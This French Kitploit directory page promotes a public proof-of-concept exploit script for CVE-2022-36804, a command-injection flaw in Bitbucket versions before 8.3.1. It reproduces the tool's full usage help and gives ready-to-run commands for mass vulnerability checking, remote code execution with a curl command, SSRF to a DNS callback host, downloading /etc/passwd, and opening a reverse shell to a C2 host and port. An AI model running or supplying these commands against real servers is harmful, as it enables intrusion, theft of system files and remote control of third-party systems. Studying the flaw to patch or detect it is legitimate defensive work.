Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-36804-PoC — Script d'exploitation multithreadé pour CVE-2022-36804 affectant les versions de BitBucket <8.3.1 | Kitploit
Outils/GitHubGitHub/notxesh/cve-2022-36804-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubnotxesh/cve-2022-36804-poc

CVE-2022-36804-PoC

Script d'exploitation multithreadé pour CVE-2022-36804 affectant les versions de BitBucket <8.3.1

Voir le dépôt
188il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-36804-PoC

Script d'exploitation multithreadé pour CVE-2022-36804 affectant (la plupart) des versions de BitBucket <8.3.1 Voir l'avis complet ici https://jira.atlassian.com/browse/BSERV-13438

Tout le crédit à TheGrandPew pour la découverte

Le script détecte automatiquement les dépôts publics situés sur des instances Bitbucket, puis sélectionne un dépôt aléatoire pour vérifier ou effectuer la vulnérabilité. S'il n'y a pas de dépôts publics, un cookie 'BITBUCKETSESSIONID' valide est nécessaire pour exploiter les instances vulnérables connues.

Le PoC a été conçu pour prendre plusieurs hôtes en entrée et rediriger les hôtes vulnérables vers la sortie standard, permettant le piping des résultats afin d'être traités par d'autres outils.

Ne pas utiliser à des fins malveillantes.

Utilisation

root@kitploit:~
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
                         [--skip-check] [-t THREADS] [-v]
                         repos [repos ...]

CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  repos                 Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on

optional arguments:
  --auth-cookie AUTH_COOKIE
                        Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
  --proxy PROXY         HTTP Proxy: <http/https>://<ip>:<port>
  -e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
                        Exploit to perform
  --cmd CMD             Command to execute for the 'rce' exploit (curl http://example.com)
  --knary KNARY         Knary to respond too via DNS for the 'ssrf' exploit
  --server-file SERVER_FILE
                        Server file to download for the 'download' exploit (/etc/passwd)
  --host HOST           Hostname or IP address of c2 for the 'rev_shell' exploit
  --port PORT           Port of the c2 for the 'rev_shell' exploit
  --skip-check          Skip vulnerability checking stage
  -t THREADS, --threads THREADS
                        Worker Threads
  -v, --verbose         Increase output verbosity level

Modes d'exploitation

Vérification

Hôte unique

CVE-2022-36804.py http://bitbucket.local:7990/

Plusieurs hôtes et redirection des hôtes vulnérables et des dépôts exploités vers un fichier

CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts

RCE (Exécution de code à distance)

CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/

SSRF (Falsification de requête côté serveur)

Effectuer une requête DNS vers le knary spécifié

CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/

Téléchargement

Télécharger un dépôt avec le fichier cible /etc/passwd, cela sauvegardera le dépôt compressé avec un nom de fichier aléatoire.

CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/

Rev_shell (Génère un shell sh inverse vers l'hôte et le port spécifiés)

CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/

Télécharger l’outil